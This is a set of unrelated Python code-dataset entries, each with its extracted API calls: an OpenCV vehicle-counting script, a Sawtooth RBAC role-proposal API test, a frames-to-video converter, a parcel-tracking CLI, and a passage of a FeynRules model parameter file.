| [((244, 296), 'collections.namedtuple', 'namedtuple', (['"""TopicPartition"""', "['topic', 'partition']"], {}), "('TopicPartition', ['topic', 'partition'])\n", (254, 296), False, 'from collections import namedtuple\n'), ((693, 757), 'collections.namedtuple', 'namedtuple', (['"""BrokerMetadata"""', "['nodeId', 'host', 'port', 'rack']"], {}), "('BrokerMetadata', ['nodeId', 'host', 'port', 'rack'])\n", (703, 757), False, 'from collections import namedtuple\n'), ((1460, 1557), 'collections.namedtuple', 'namedtuple', (['"""PartitionMetadata"""', "['topic', 'partition', 'leader', 'replicas', 'isr', 'error']"], {}), "('PartitionMetadata', ['topic', 'partition', 'leader', 'replicas',\n 'isr', 'error'])\n", (1470, 1557), False, 'from collections import namedtuple\n'), ((1970, 2025), 'collections.namedtuple', 'namedtuple', (['"""OffsetAndMetadata"""', "['offset', 'metadata']"], {}), "('OffsetAndMetadata', ['offset', 'metadata'])\n", (1980, 2025), False, 'from collections import namedtuple\n'), ((2275, 2332), 'collections.namedtuple', 'namedtuple', (['"""OffsetAndTimestamp"""', "['offset', 'timestamp']"], {}), "('OffsetAndTimestamp', ['offset', 'timestamp'])\n", (2285, 2332), False, 'from collections import namedtuple\n'), ((2358, 2476), 'collections.namedtuple', 'namedtuple', (['"""MemberInformation"""', "['member_id', 'client_id', 'client_host', 'member_metadata',\n 'member_assignment']"], {}), "('MemberInformation', ['member_id', 'client_id', 'client_host',\n 'member_metadata', 'member_assignment'])\n", (2368, 2476), False, 'from collections import namedtuple\n'), ((2497, 2630), 'collections.namedtuple', 'namedtuple', (['"""GroupInformation"""', "['error_code', 'group', 'state', 'protocol_type', 'protocol', 'members',\n 'authorized_operations']"], {}), "('GroupInformation', ['error_code', 'group', 'state',\n 'protocol_type', 'protocol', 'members', 'authorized_operations'])\n", (2507, 2630), False, 'from collections import namedtuple\n'), ((2850, 2922), 'collections.namedtuple', 'namedtuple', (['"""RetryOptions"""', "['limit', 'backoff_ms', 'retry_on_timeouts']"], {}), "('RetryOptions', ['limit', 'backoff_ms', 'retry_on_timeouts'])\n", (2860, 2922), False, 'from collections import namedtuple\n')] |
import cv2
from trackers.tracker import create_blob, add_new_blobs, remove_duplicates
import numpy as np
from collections import OrderedDict
from detectors.detector import get_bounding_boxes
import uuid
import os
import contextlib
from datetime import datetime
import argparse
from utils.detection_roi import get_roi_frame, draw_roi
from counter import get_counting_line, is_passed_counting_line
# parse CLI arguments
parser = argparse.ArgumentParser()
parser.add_argument('video', help='relative/absolute path to video or camera input of traffic scene')
parser.add_argument('--iscam', action='store_true', help='specify if video capture is from a camera')
parser.add_argument('--droi', help='specify a detection region of interest (ROI) \
i.e a set of vertices that represent the area (polygon) \
where you want detections to be made (format: 1,2|3,4|5,6|7,8|9,10 \
default: 0,0|frame_width,0|frame_width,frame_height|0,frame_height \
[i.e the whole video frame])')
parser.add_argument('--showdroi', action='store_true', help='display/overlay the detection roi on the video')
parser.add_argument('--mctf', type=int, help='maximum consecutive tracking failures \
i.e number of tracking failures before the tracker concludes \
the tracked object has left the frame')
parser.add_argument('--di', type=int, help='detection interval i.e number of frames \
before detection is carried out again (in order to find new vehicles \
and update the trackers of old ones)')
parser.add_argument('--detector', help='select a model/algorithm to use for vehicle detection \
(options: yolo, haarc, bgsub, ssd | default: yolo)')
parser.add_argument('--tracker', help='select a model/algorithm to use for vehicle tracking \
(options: csrt, kcf, camshift | default: kcf)')
parser.add_argument('--record', action='store_true', help='record video and vehicle count logs')
parser.add_argument('--clposition', help='position of counting line (options: top, bottom, \
left, right | default: bottom)')
parser.add_argument('--hideimage', action='store_true', help='hide resulting image')
args = parser.parse_args()
# capture traffic scene video
video = int(args.video) if args.iscam else args.video
cap = cv2.VideoCapture(video)
_, frame = cap.read()
# configs
blobs = OrderedDict()
blob_id = 1
frame_counter = 0
DETECTION_INTERVAL = 10 if args.di == None else args.di
MAX_CONSECUTIVE_TRACKING_FAILURES = 3 if args.mctf == None else args.mctf
detector = 'yolo' if args.detector == None else args.detector
tracker = 'kcf' if args.tracker == None else args.tracker
f_height, f_width, _ = frame.shape
# init video object and log file to record counting
if args.record:
output_video = cv2.VideoWriter('./videos/output.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 30, (f_width, f_height))
log_file_name = 'log.txt'
with contextlib.suppress(FileNotFoundError):
os.remove(log_file_name)
log_file = open(log_file_name, 'a')
log_file.write('vehicle_id, count, datetime\n')
log_file.flush()
# set counting line
clposition = 'bottom' if args.clposition == None else args.clposition
counting_line = get_counting_line(clposition, f_width, f_height)
vehicle_count = 0
# create detection ROI
droi = [(0, 0), (f_width, 0), (f_width, f_height), (0, f_height)]
if args.droi:
droi = []
points = args.droi.replace(' ', '').split('|')
for point_str in points:
point = tuple(map(int, point_str.split(',')))
droi.append(point)
# initialize trackers and create new blobs
droi_frame = get_roi_frame(frame, droi)
initial_bboxes = get_bounding_boxes(droi_frame, detector)
for box in initial_bboxes:
_blob = create_blob(box, frame, tracker)
blobs[blob_id] = _blob
blob_id += 1
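# Main loop: update trackers every frame, re-run detection every DETECTION_INTERVAL frames,
# and count each blob once when its centroid crosses the counting line.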
while True:
k = cv2.waitKey(1)
if args.iscam or cap.get(cv2.CAP_PROP_POS_FRAMES) + 1 < cap.get(cv2.CAP_PROP_FRAME_COUNT):
_, frame = cap.read()
nframes = cap.get(cv2.CAP_PROP_POS_FRAMES)
frame_count = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if nframes % 10 == 0 or nframes == 1:
print("Processing {} of {} frames".format(nframes,frame_count))
for _id, blob in list(blobs.items()):
# update trackers
success, box = blob.tracker.update(frame)
if success:
blob.num_consecutive_tracking_failures = 0
blob.update(box)
else:
blob.num_consecutive_tracking_failures += 1
# delete untracked blobs
if blob.num_consecutive_tracking_failures >= MAX_CONSECUTIVE_TRACKING_FAILURES:
del blobs[_id]
# count vehicles
if is_passed_counting_line(blob.centroid, counting_line, clposition) and not blob.counted:
blob.counted = True
vehicle_count += 1
# log count data to a file (vehicle_id, count, datetime)
if args.record:
_row = '{0}, {1}, {2}\n'.format('v_' + str(_id), vehicle_count, datetime.now())
log_file.write(_row)
log_file.flush()
if frame_counter >= DETECTION_INTERVAL:
# rerun detection
droi_frame = get_roi_frame(frame, droi)
boxes = get_bounding_boxes(droi_frame, detector)
blobs, current_blob_id = add_new_blobs(boxes, blobs, frame, tracker, blob_id, counting_line, clposition)
blob_id = current_blob_id
blobs = remove_duplicates(blobs)
frame_counter = 0
# draw and label blob bounding boxes
for _id, blob in blobs.items():
(x, y, w, h) = [int(v) for v in blob.bounding_box]
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.putText(frame, 'v_' + str(_id), (x, y - 2), cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)
# draw counting line
cv2.line(frame, counting_line[0], counting_line[1], (0, 255, 0), 3)
# display vehicle count
cv2.putText(frame, 'Count: ' + str(vehicle_count), (20, 60), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 2, cv2.LINE_AA)
# show detection roi
if args.showdroi:
frame = draw_roi(frame, droi)
# save frame in video output
if args.record:
output_video.write(frame)
# visualize vehicle counting
if not args.hideimage:
resized_frame = cv2.resize(frame, (858, 480))
cv2.imshow('tracking', resized_frame)
frame_counter += 1
# save frame if 's' key is pressed
if k & 0xFF == ord('s'):
cv2.imwrite(os.path.join('screenshots', 'ss_' + uuid.uuid4().hex + '.png'), frame)
print('Screenshot taken.')
else:
print('End of video.')
# end video loop if on the last frame
break
# end video loop if 'q' key is pressed
if k & 0xFF == ord('q'):
print('Video exited.')
break
# end capture, close window, close log file and video objects if any
cap.release()
if not args.hideimage:
cv2.destroyAllWindows()
if args.record:
log_file.close()
output_video.release() | [
"cv2.rectangle",
"cv2.imshow",
"cv2.destroyAllWindows",
"trackers.tracker.create_blob",
"os.remove",
"trackers.tracker.remove_duplicates",
"utils.detection_roi.draw_roi",
"argparse.ArgumentParser",
"utils.detection_roi.get_roi_frame",
"cv2.line",
"counter.get_counting_line",
"contextlib.suppress",
"counter.is_passed_counting_line",
"cv2.VideoWriter_fourcc",
"cv2.waitKey",
"collections.OrderedDict",
"uuid.uuid4",
"detectors.detector.get_bounding_boxes",
"trackers.tracker.add_new_blobs",
"cv2.resize",
"datetime.datetime.now",
"cv2.VideoCapture"
]
| [((429, 454), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (452, 454), False, 'import argparse\n'), ((2403, 2426), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (2419, 2426), False, 'import cv2\n'), ((2468, 2481), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2479, 2481), False, 'from collections import OrderedDict\n'), ((3323, 3371), 'counter.get_counting_line', 'get_counting_line', (['clposition', 'f_width', 'f_height'], {}), '(clposition, f_width, f_height)\n', (3340, 3371), False, 'from counter import get_counting_line, is_passed_counting_line\n'), ((3726, 3752), 'utils.detection_roi.get_roi_frame', 'get_roi_frame', (['frame', 'droi'], {}), '(frame, droi)\n', (3739, 3752), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((3770, 3810), 'detectors.detector.get_bounding_boxes', 'get_bounding_boxes', (['droi_frame', 'detector'], {}), '(droi_frame, detector)\n', (3788, 3810), False, 'from detectors.detector import get_bounding_boxes\n'), ((3850, 3882), 'trackers.tracker.create_blob', 'create_blob', (['box', 'frame', 'tracker'], {}), '(box, frame, tracker)\n', (3861, 3882), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((3948, 3962), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3959, 3962), False, 'import cv2\n'), ((7270, 7293), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7291, 7293), False, 'import cv2\n'), ((2924, 2966), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (['"""M"""', '"""J"""', '"""P"""', '"""G"""'], {}), "('M', 'J', 'P', 'G')\n", (2946, 2966), False, 'import cv2\n'), ((3030, 3068), 'contextlib.suppress', 'contextlib.suppress', (['FileNotFoundError'], {}), '(FileNotFoundError)\n', (3049, 3068), False, 'import contextlib\n'), ((3078, 3102), 'os.remove', 'os.remove', (['log_file_name'], {}), '(log_file_name)\n', (3087, 3102), False, 'import os\n'), ((6099, 6166), 'cv2.line', 'cv2.line', (['frame', 'counting_line[0]', 'counting_line[1]', '(0, 255, 0)', '(3)'], {}), '(frame, counting_line[0], counting_line[1], (0, 255, 0), 3)\n', (6107, 6166), False, 'import cv2\n'), ((5404, 5430), 'utils.detection_roi.get_roi_frame', 'get_roi_frame', (['frame', 'droi'], {}), '(frame, droi)\n', (5417, 5430), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((5451, 5491), 'detectors.detector.get_bounding_boxes', 'get_bounding_boxes', (['droi_frame', 'detector'], {}), '(droi_frame, detector)\n', (5469, 5491), False, 'from detectors.detector import get_bounding_boxes\n'), ((5529, 5608), 'trackers.tracker.add_new_blobs', 'add_new_blobs', (['boxes', 'blobs', 'frame', 'tracker', 'blob_id', 'counting_line', 'clposition'], {}), '(boxes, blobs, frame, tracker, blob_id, counting_line, clposition)\n', (5542, 5608), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((5667, 5691), 'trackers.tracker.remove_duplicates', 'remove_duplicates', (['blobs'], {}), '(blobs)\n', (5684, 5691), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((5883, 5943), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 255, 0)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n', (5896, 5943), False, 'import cv2\n'), ((6402, 6423), 'utils.detection_roi.draw_roi', 'draw_roi', (['frame', 'droi'], {}), '(frame, droi)\n', (6410, 6423), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((6621, 6650), 'cv2.resize', 
'cv2.resize', (['frame', '(858, 480)'], {}), '(frame, (858, 480))\n', (6631, 6650), False, 'import cv2\n'), ((6663, 6700), 'cv2.imshow', 'cv2.imshow', (['"""tracking"""', 'resized_frame'], {}), "('tracking', resized_frame)\n", (6673, 6700), False, 'import cv2\n'), ((4857, 4922), 'counter.is_passed_counting_line', 'is_passed_counting_line', (['blob.centroid', 'counting_line', 'clposition'], {}), '(blob.centroid, counting_line, clposition)\n', (4880, 4922), False, 'from counter import get_counting_line, is_passed_counting_line\n'), ((5206, 5220), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5218, 5220), False, 'from datetime import datetime\n'), ((6866, 6878), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6876, 6878), False, 'import uuid\n')] |
# Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
""" Propose Role Add Member Test """
# pylint: disable=invalid-name
import time
import requests
import pytest
from rbac.common.logs import get_logger
from tests.rbac import helper
from tests.rbac.api.assertions import assert_api_error
from tests.rbac.api.assertions import assert_api_success
from tests.rbac.api.assertions import assert_api_post_requires_auth
LOGGER = get_logger(__name__)
@pytest.mark.api
@pytest.mark.api_role
def test_api_propose_role_member():
""" Test a user proposing to add themselves to a role
"""
owner = helper.api.user.current
role = helper.api.role.create.new(user=owner)
user = helper.api.user.current2
url = helper.api.role.member.propose.url(role_id=role["id"])
data = {"id": user["user_id"]}
assert assert_api_post_requires_auth(url=url, json=data)
response = requests.post(
url=url, headers={"Authorization": user["token"]}, json=data
)
result = assert_api_success(response)
assert result["proposal_id"]
time.sleep(0.5) # temporary until API refactored to return the proposal
proposal = helper.api.proposal.get(result["proposal_id"], owner)
assert proposal["id"] == result["proposal_id"]
assert proposal["status"] == "OPEN"
assert proposal["type"] == "ADD_ROLE_MEMBER"
assert proposal["object"] == role["id"]
assert proposal["target"] == user["user_id"]
assert proposal["opener"] == user["user_id"]
@pytest.mark.api
@pytest.mark.api_role
def test_api_propose_role_member_required_fields():
""" Test proposing adding a member to a role with missing fields
"""
role, _ = helper.api.role.current
user = helper.api.user.create.current
url = helper.api.role.member.propose.url(role_id=role["id"])
data = {}
response = requests.post(
url=url, headers={"Authorization": user["token"]}, json=data
)
assert_api_error(response, "Bad Request: id field is required", 400)
| [
"requests.post",
"tests.rbac.helper.api.role.member.propose.url",
"tests.rbac.api.assertions.assert_api_success",
"tests.rbac.helper.api.proposal.get",
"tests.rbac.helper.api.role.create.new",
"time.sleep",
"tests.rbac.api.assertions.assert_api_error",
"tests.rbac.api.assertions.assert_api_post_requires_auth",
"rbac.common.logs.get_logger"
]
| [((1053, 1073), 'rbac.common.logs.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (1063, 1073), False, 'from rbac.common.logs import get_logger\n'), ((1264, 1302), 'tests.rbac.helper.api.role.create.new', 'helper.api.role.create.new', ([], {'user': 'owner'}), '(user=owner)\n', (1290, 1302), False, 'from tests.rbac import helper\n'), ((1349, 1403), 'tests.rbac.helper.api.role.member.propose.url', 'helper.api.role.member.propose.url', ([], {'role_id': "role['id']"}), "(role_id=role['id'])\n", (1383, 1403), False, 'from tests.rbac import helper\n'), ((1450, 1499), 'tests.rbac.api.assertions.assert_api_post_requires_auth', 'assert_api_post_requires_auth', ([], {'url': 'url', 'json': 'data'}), '(url=url, json=data)\n', (1479, 1499), False, 'from tests.rbac.api.assertions import assert_api_post_requires_auth\n'), ((1515, 1590), 'requests.post', 'requests.post', ([], {'url': 'url', 'headers': "{'Authorization': user['token']}", 'json': 'data'}), "(url=url, headers={'Authorization': user['token']}, json=data)\n", (1528, 1590), False, 'import requests\n'), ((1618, 1646), 'tests.rbac.api.assertions.assert_api_success', 'assert_api_success', (['response'], {}), '(response)\n', (1636, 1646), False, 'from tests.rbac.api.assertions import assert_api_success\n'), ((1684, 1699), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (1694, 1699), False, 'import time\n'), ((1772, 1825), 'tests.rbac.helper.api.proposal.get', 'helper.api.proposal.get', (["result['proposal_id']", 'owner'], {}), "(result['proposal_id'], owner)\n", (1795, 1825), False, 'from tests.rbac import helper\n'), ((2368, 2422), 'tests.rbac.helper.api.role.member.propose.url', 'helper.api.role.member.propose.url', ([], {'role_id': "role['id']"}), "(role_id=role['id'])\n", (2402, 2422), False, 'from tests.rbac import helper\n'), ((2452, 2527), 'requests.post', 'requests.post', ([], {'url': 'url', 'headers': "{'Authorization': user['token']}", 'json': 'data'}), "(url=url, headers={'Authorization': user['token']}, json=data)\n", (2465, 2527), False, 'import requests\n'), ((2546, 2614), 'tests.rbac.api.assertions.assert_api_error', 'assert_api_error', (['response', '"""Bad Request: id field is required"""', '(400)'], {}), "(response, 'Bad Request: id field is required', 400)\n", (2562, 2614), False, 'from tests.rbac.api.assertions import assert_api_error\n')] |
import cv2
import os
import numpy as np
from PIL import Image
def frame2video(im_dir, video_dir, fps):
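# Stitch the numbered frames in im_dir into a video file at video_dir with the given fps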
im_list = os.listdir(im_dir)
im_list.sort(key=lambda x: int(x.replace("_RBPNF7", "").split('.')[0]))
img = Image.open(os.path.join(im_dir, im_list[0]))
img_size = img.size # get the image resolution; every image under im_dir must have the same resolution
fourcc = cv2.VideoWriter_fourcc(*'XVID')
videoWriter = cv2.VideoWriter(video_dir, fourcc, fps, img_size)
for i in im_list:
im_name = os.path.join(im_dir + i)
frame = cv2.imdecode(np.fromfile(im_name, dtype=np.uint8), -1)
videoWriter.write(frame)
videoWriter.release()
if __name__ == '__main__':
im_dir = '/media/hy/Seagate Expansion Drive/Results/merge_dir/' # directory holding the frames
video_dir = '/media/hy/Seagate Expansion Drive/Results/sandy.mp4' # path of the output video
fps = 15 # frame rate
frame2video(im_dir, video_dir, fps)
| [
"numpy.fromfile",
"os.listdir",
"os.path.join",
"cv2.VideoWriter",
"cv2.VideoWriter_fourcc"
]
| [((119, 137), 'os.listdir', 'os.listdir', (['im_dir'], {}), '(im_dir)\n', (129, 137), False, 'import os\n'), ((338, 369), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'XVID'"], {}), "(*'XVID')\n", (360, 369), False, 'import cv2\n'), ((388, 437), 'cv2.VideoWriter', 'cv2.VideoWriter', (['video_dir', 'fourcc', 'fps', 'img_size'], {}), '(video_dir, fourcc, fps, img_size)\n', (403, 437), False, 'import cv2\n'), ((235, 267), 'os.path.join', 'os.path.join', (['im_dir', 'im_list[0]'], {}), '(im_dir, im_list[0])\n', (247, 267), False, 'import os\n'), ((478, 502), 'os.path.join', 'os.path.join', (['(im_dir + i)'], {}), '(im_dir + i)\n', (490, 502), False, 'import os\n'), ((532, 568), 'numpy.fromfile', 'np.fromfile', (['im_name'], {'dtype': 'np.uint8'}), '(im_name, dtype=np.uint8)\n', (543, 568), True, 'import numpy as np\n')] |
# coding: utf-8
import click
@click.command()
@click.option('--carrier', prompt='Carrier ID', help='Example: "ect" for Correios')
@click.option('--object-id', prompt='Object ID',
help='Example: PN871429404BR')
def main(carrier, object_id):
from trackr import Trackr
from trackr.exceptions import PackageNotFound
try:
p = Trackr.track(carrier, object_id)
except PackageNotFound as e:
click.echo(click.style(
u'Package with object ID {} ({}) not found'.format(
object_id, carrier),
fg='red')
)
if e.carrier_message:
click.echo(click.style(
u'Carrier message: {}'.format(e.carrier_message),
fg='red',)
)
return
click.echo(click.style(u'Package found!', fg='green'))
for t in p.tracking_info:
click.echo(t.__unicode__())
if __name__ == "__main__":
main()
| [
"click.option",
"click.command",
"trackr.Trackr.track",
"click.style"
]
| [((32, 47), 'click.command', 'click.command', ([], {}), '()\n', (45, 47), False, 'import click\n'), ((49, 136), 'click.option', 'click.option', (['"""--carrier"""'], {'prompt': '"""Carrier ID"""', 'help': '"""Example: "ect" for Correios"""'}), '(\'--carrier\', prompt=\'Carrier ID\', help=\n \'Example: "ect" for Correios\')\n', (61, 136), False, 'import click\n'), ((133, 211), 'click.option', 'click.option', (['"""--object-id"""'], {'prompt': '"""Object ID"""', 'help': '"""Example: PN871429404BR"""'}), "('--object-id', prompt='Object ID', help='Example: PN871429404BR')\n", (145, 211), False, 'import click\n'), ((358, 390), 'trackr.Trackr.track', 'Trackr.track', (['carrier', 'object_id'], {}), '(carrier, object_id)\n', (370, 390), False, 'from trackr import Trackr\n'), ((794, 836), 'click.style', 'click.style', (['u"""Package found!"""'], {'fg': '"""green"""'}), "(u'Package found!', fg='green')\n", (805, 836), False, 'import click\n')] |
# This file was automatically created by FeynRules 2.3.32
# Mathematica version: 11.3.0 for Mac OS X x86 (64-bit) (March 7, 2018)
# Date: Sat 21 Apr 2018 20:48:39
from object_library import all_parameters, Parameter
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
# This is a default parameter object representing 0.
ZERO = Parameter(name = 'ZERO',
nature = 'internal',
type = 'real',
value = '0.0',
texname = '0')
# User-defined parameters.
cabi = Parameter(name = 'cabi',
nature = 'external',
type = 'real',
value = 0.227736,
texname = '\\theta _c',
lhablock = 'CKMBLOCK',
lhacode = [ 1 ])
aEWM1 = Parameter(name = 'aEWM1',
nature = 'external',
type = 'real',
value = 127.9,
texname = '\\text{aEWM1}',
lhablock = 'SMINPUTS',
lhacode = [ 1 ])
Gf = Parameter(name = 'Gf',
nature = 'external',
type = 'real',
value = 0.0000116637,
texname = 'G_f',
lhablock = 'SMINPUTS',
lhacode = [ 2 ])
aS = Parameter(name = 'aS',
nature = 'external',
type = 'real',
value = 0.1184,
texname = '\\alpha _s',
lhablock = 'SMINPUTS',
lhacode = [ 3 ])
ymdo = Parameter(name = 'ymdo',
nature = 'external',
type = 'real',
value = 0.00504,
texname = '\\text{ymdo}',
lhablock = 'YUKAWA',
lhacode = [ 1 ])
ymup = Parameter(name = 'ymup',
nature = 'external',
type = 'real',
value = 0.00255,
texname = '\\text{ymup}',
lhablock = 'YUKAWA',
lhacode = [ 2 ])
yms = Parameter(name = 'yms',
nature = 'external',
type = 'real',
value = 0.101,
texname = '\\text{yms}',
lhablock = 'YUKAWA',
lhacode = [ 3 ])
ymc = Parameter(name = 'ymc',
nature = 'external',
type = 'real',
value = 1.27,
texname = '\\text{ymc}',
lhablock = 'YUKAWA',
lhacode = [ 4 ])
ymb = Parameter(name = 'ymb',
nature = 'external',
type = 'real',
value = 4.7,
texname = '\\text{ymb}',
lhablock = 'YUKAWA',
lhacode = [ 5 ])
ymt = Parameter(name = 'ymt',
nature = 'external',
type = 'real',
value = 172,
texname = '\\text{ymt}',
lhablock = 'YUKAWA',
lhacode = [ 6 ])
yme = Parameter(name = 'yme',
nature = 'external',
type = 'real',
value = 0.000511,
texname = '\\text{yme}',
lhablock = 'YUKAWA',
lhacode = [ 11 ])
ymm = Parameter(name = 'ymm',
nature = 'external',
type = 'real',
value = 0.10566,
texname = '\\text{ymm}',
lhablock = 'YUKAWA',
lhacode = [ 13 ])
ymtau = Parameter(name = 'ymtau',
nature = 'external',
type = 'real',
value = 1.777,
texname = '\\text{ymtau}',
lhablock = 'YUKAWA',
lhacode = [ 15 ])
kq = Parameter(name = 'kq',
nature = 'external',
type = 'real',
value = 0.001,
texname = 'k_q',
lhablock = 'FRBlock',
lhacode = [ 1 ])
lamf = Parameter(name = 'lamf',
nature = 'external',
type = 'real',
value = 0.1,
texname = 'l_{\\text{fi}}',
lhablock = 'FRBlock',
lhacode = [ 2 ])
yf1x1 = Parameter(name = 'yf1x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x1}',
lhablock = 'FRBlock6',
lhacode = [ 1, 1 ])
yf1x2 = Parameter(name = 'yf1x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x2}',
lhablock = 'FRBlock6',
lhacode = [ 1, 2 ])
yf1x3 = Parameter(name = 'yf1x3',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x3}',
lhablock = 'FRBlock6',
lhacode = [ 1, 3 ])
yf2x1 = Parameter(name = 'yf2x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf2x1}',
lhablock = 'FRBlock6',
lhacode = [ 2, 1 ])
yf2x2 = Parameter(name = 'yf2x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf2x2}',
lhablock = 'FRBlock6',
lhacode = [ 2, 2 ])
yf2x3 = Parameter(name = 'yf2x3',
nature = 'external',
type = 'complex',
value = 1.e-6,
texname = '\\text{yf2x3}',
lhablock = 'FRBlock6',
lhacode = [ 2, 3 ])
yf3x1 = Parameter(name = 'yf3x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x1}',
lhablock = 'FRBlock6',
lhacode = [ 3, 1 ])
yf3x2 = Parameter(name = 'yf3x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x2}',
lhablock = 'FRBlock6',
lhacode = [ 3, 2 ])
yf3x3 = Parameter(name = 'yf3x3',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x3}',
lhablock = 'FRBlock6',
lhacode = [ 3, 3 ])
MZ = Parameter(name = 'MZ',
nature = 'external',
type = 'real',
value = 91.1876,
texname = '\\text{MZ}',
lhablock = 'MASS',
lhacode = [ 23 ])
Me = Parameter(name = 'Me',
nature = 'external',
type = 'real',
value = 0.000511,
texname = '\\text{Me}',
lhablock = 'MASS',
lhacode = [ 11 ])
MMU = Parameter(name = 'MMU',
nature = 'external',
type = 'real',
value = 0.10566,
texname = '\\text{MMU}',
lhablock = 'MASS',
lhacode = [ 13 ])
MTA = Parameter(name = 'MTA',
nature = 'external',
type = 'real',
value = 1.777,
texname = '\\text{MTA}',
lhablock = 'MASS',
lhacode = [ 15 ])
MU = Parameter(name = 'MU',
nature = 'external',
type = 'real',
value = 0.00255,
texname = 'M',
lhablock = 'MASS',
lhacode = [ 2 ])
MC = Parameter(name = 'MC',
nature = 'external',
type = 'real',
value = 1.27,
texname = '\\text{MC}',
lhablock = 'MASS',
lhacode = [ 4 ])
MT = Parameter(name = 'MT',
nature = 'external',
type = 'real',
value = 172,
texname = '\\text{MT}',
lhablock = 'MASS',
lhacode = [ 6 ])
MD = Parameter(name = 'MD',
nature = 'external',
type = 'real',
value = 0.00504,
texname = '\\text{MD}',
lhablock = 'MASS',
lhacode = [ 1 ])
MS = Parameter(name = 'MS',
nature = 'external',
type = 'real',
value = 0.101,
texname = '\\text{MS}',
lhablock = 'MASS',
lhacode = [ 3 ])
MB = Parameter(name = 'MB',
nature = 'external',
type = 'real',
value = 4.7,
texname = '\\text{MB}',
lhablock = 'MASS',
lhacode = [ 5 ])
MH = Parameter(name = 'MH',
nature = 'external',
type = 'real',
value = 125,
texname = '\\text{MH}',
lhablock = 'MASS',
lhacode = [ 25 ])
MP = Parameter(name = 'MP',
nature = 'external',
type = 'real',
value = 120,
texname = '\\text{MP}',
lhablock = 'MASS',
lhacode = [ 9000005 ])
Mfi = Parameter(name = 'Mfi',
nature = 'external',
type = 'real',
value = 10,
texname = '\\text{Mfi}',
lhablock = 'MASS',
lhacode = [ 9000006 ])
WZ = Parameter(name = 'WZ',
nature = 'external',
type = 'real',
value = 2.4952,
texname = '\\text{WZ}',
lhablock = 'DECAY',
lhacode = [ 23 ])
WW = Parameter(name = 'WW',
nature = 'external',
type = 'real',
value = 2.085,
texname = '\\text{WW}',
lhablock = 'DECAY',
lhacode = [ 24 ])
WT = Parameter(name = 'WT',
nature = 'external',
type = 'real',
value = 1.50833649,
texname = '\\text{WT}',
lhablock = 'DECAY',
lhacode = [ 6 ])
WH = Parameter(name = 'WH',
nature = 'external',
type = 'real',
value = 0.00589569,
texname = '\\text{WH}',
lhablock = 'DECAY',
lhacode = [ 25 ])
WH1 = Parameter(name = 'WH1',
nature = 'external',
type = 'real',
value = 0.00575308848,
texname = '\\text{WH1}',
lhablock = 'DECAY',
lhacode = [ 9000005 ])
Wfi = Parameter(name = 'Wfi',
nature = 'external',
type = 'real',
value = 6.03044e-9,
texname = '\\text{Wfi}',
lhablock = 'DECAY',
lhacode = [ 9000006 ])
aEW = Parameter(name = 'aEW',
nature = 'internal',
type = 'real',
value = '1/aEWM1',
texname = '\\alpha _{\\text{EW}}')
G = Parameter(name = 'G',
nature = 'internal',
type = 'real',
value = '2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)',
texname = 'G')
CKM1x1 = Parameter(name = 'CKM1x1',
nature = 'internal',
type = 'complex',
value = 'cmath.cos(cabi)',
texname = '\\text{CKM1x1}')
CKM1x2 = Parameter(name = 'CKM1x2',
nature = 'internal',
type = 'complex',
value = 'cmath.sin(cabi)',
texname = '\\text{CKM1x2}')
CKM1x3 = Parameter(name = 'CKM1x3',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM1x3}')
CKM2x1 = Parameter(name = 'CKM2x1',
nature = 'internal',
type = 'complex',
value = '-cmath.sin(cabi)',
texname = '\\text{CKM2x1}')
CKM2x2 = Parameter(name = 'CKM2x2',
nature = 'internal',
type = 'complex',
value = 'cmath.cos(cabi)',
texname = '\\text{CKM2x2}')
CKM2x3 = Parameter(name = 'CKM2x3',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM2x3}')
CKM3x1 = Parameter(name = 'CKM3x1',
nature = 'internal',
type = 'complex',
value = '0',
